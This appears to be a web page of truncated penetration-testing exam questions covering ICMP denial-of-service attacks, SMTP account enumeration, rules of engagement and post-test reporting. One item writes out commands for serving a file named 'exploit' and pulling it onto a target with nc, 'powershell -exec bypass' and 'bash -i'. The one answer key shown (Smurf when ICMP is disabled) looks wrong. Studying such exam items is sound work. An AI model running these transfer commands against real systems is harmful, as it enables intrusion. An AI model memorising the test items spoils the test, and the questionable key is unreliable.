Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine?A . Edit...
Which of the following could be used for a denial-of-service attack on the network segment?
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?A . SmurfB . Ping floodC . FraggleD . Ping of deathView AnswerAnswer: A Explanation: Reference: https://resources.infosecinstitute.com/topic/icmp-attacks/
You are a penetration tester reviewing a client’s website through a web browser
DRAG DROP You are a penetration tester reviewing a client’s website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like...
Based on the information in the SOW, which of the following behaviors would be considered unethical?
A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO)...
Which of the following best describes the NEXT step in the engagement?
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?A . Acceptance by the client and sign-off on the final reportB . Scheduling of follow-up actions and retestingC . Attestation of findings and delivery...
Which of the following commands should be used to accomplish the goal?
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?A . VRFY and EXPNB . VRFY and...
Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?A . Test for RFC-defined protocol conformance.B . Attempt...
Which of the following actions should the tester take?
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the...
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A penetration tester ran the following command on a staging server: python Cm SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?A . nc 10.10.51.50 9891 < exploitB . powershell Cexec bypass Cf \10.10.51.509891C . bash Ci...
Which of the following is the MOST important action to take before starting this type of assessment?
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this...